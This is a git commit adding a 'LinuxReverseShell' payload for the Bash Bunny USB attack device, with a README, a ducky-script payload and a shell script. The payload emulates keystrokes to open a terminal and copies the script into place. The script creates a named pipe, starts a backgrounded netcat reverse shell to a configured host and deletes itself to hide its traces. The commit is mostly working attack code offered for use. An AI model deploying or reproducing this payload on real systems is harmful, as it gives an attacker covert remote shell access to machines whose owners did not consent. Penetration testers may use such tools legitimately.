Added LinuxReverseShell payload (#107)

2025-10-29 16:58:25 +00:00 · 2017-04-07 17:57:19 +12:00 · 2017-04-07 17:57:19 +12:00 · b864fc30a7
commit b864fc30a7
parent 1760b60b4f
3 changed files with 90 additions and 0 deletions
--- a/payloads/library/LinuxReverseShell/README.md
+++ b/payloads/library/LinuxReverseShell/README.md
@ -0,0 +1,31 @@
+# Linux Reverse Shell for Bash Bunny
+
+Author: tuzzmaniandevil
+Version: Version 1.0
+
+## Description
+
+With the help of ducky script, it opens a terminal window using `CTRL ALT T`. Once the window is open it will copy the script to a hidden directory in the home directory.
+The script will then be executed which starts a background reverse shell, delete itself and closes the terminal window.
+
+Great when combined with the LAN Turtle :-)
+
+Example listening for the connection on linux:
+`nc -nlvp 4444`
+
+## Configuration
+
+- **RHOST** The host computer to connect to
+- **RPORT** The post to use for the connection
+
+## Requirements
+
+The RHOST pc must be accessible from the target machine
+
+## STATUS
+
+| LED              | Status                                |
+| ---------------- | ------------------------------------- |
+| Red              | Setup                                 |
+| Blue (blinking)  | Executing Ducky and starting script   |
+| Green            | Finished                              |
--- a/payloads/library/LinuxReverseShell/a.sh
+++ b/payloads/library/LinuxReverseShell/a.sh
@ -0,0 +1,10 @@
+#!/bin/bash
+A="$0"
+H=$1
+P=$2
+rm -rf ~/.a/
+mkdir -p ~/.a/
+mknod ~/.a/p p
+/bin/sh -c /bin/sh 0<~/.a/p | nc $H $P 1>~/.a/p &
+disown $!
+rm -f "$A"
--- a/payloads/library/LinuxReverseShell/payload.txt
+++ b/payloads/library/LinuxReverseShell/payload.txt
@ -0,0 +1,49 @@
+#!/bin/bash
+#
+# Title:         Linux Reverse Shell
+# Author:        tuzzmaniandevil
+# Version:       1.0
+#
+# Runs a script in the background that creates a reverse shell connection to the configured address and then removes itself.
+#
+# Red ...............Setup
+# Blue Blinking......Executing
+# Green..............Finished
+
+# Config options
+RHOST=127.0.0.1
+RPORT=4444
+
+# Start Setup
+LED R
+
+# Set Attack Mode
+ATTACKMODE HID STORAGE
+
+LANGUAGE='us'
+
+# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
+source bunny_helpers.sh
+
+# Wait for Storage to mount
+sleep 5
+
+# Open a terminal
+Q CTRL-ALT t
+
+# Wait for terminal to open
+sleep 1
+LED B 250
+
+# Copy bash script
+Q STRING "cp \$(readlink -f /dev/disk/by-label/BashBunny | while read dev;do mount | grep \"\$dev\b\" | awk '{print \$3}';done)/payloads/"
+Q STRING $SWITCH_POSITION
+Q STRING "/a.sh ~/a.sh && chmod +x ~/a.sh && ~/a.sh $RHOST $RPORT"
+Q ENTER
+
+# Quit the terminal
+LED R G 250
+Q STRING exit
+Q ENTER
+
+LED G